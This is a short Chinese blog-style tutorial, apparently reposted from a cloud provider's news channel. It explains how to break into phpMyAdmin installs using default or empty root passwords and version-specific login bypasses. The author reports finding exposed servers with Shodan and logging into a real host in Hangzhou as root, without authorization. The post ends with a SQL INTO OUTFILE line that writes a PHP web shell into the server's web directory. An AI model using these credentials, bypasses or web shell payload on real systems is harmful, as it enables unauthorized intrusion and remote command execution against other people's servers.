使用phpMyAdmin怎么通过密码漏洞留后门文件

本篇文章给大家分享的是有关使用phpMyAdmin怎么通过密码漏洞留后门文件，小编觉得挺实用的，因此分享给大家学习，希望大家阅读完这篇文章后可以有所收获，话不多说，跟着小编一起来看看吧。

• 默认 phpMyAdmin：用户名 root 密码 root 或空登陆。

• 版本 2.11.3～2.11.4：用户名 'localhost'@'@" 登陆，无需密码。

• 版本 2.11.9.2：用户名 root 登陆，无需密码。

经测试，第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

先看看有没有不需要密码登陆的，逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的（浙江省·杭州市）。

地址已手动打码。

http://121.***.*.219:80/

登陆成功（root 权限）。

接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

以上就是使用phpMyAdmin怎么通过密码漏洞留后门文件，小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。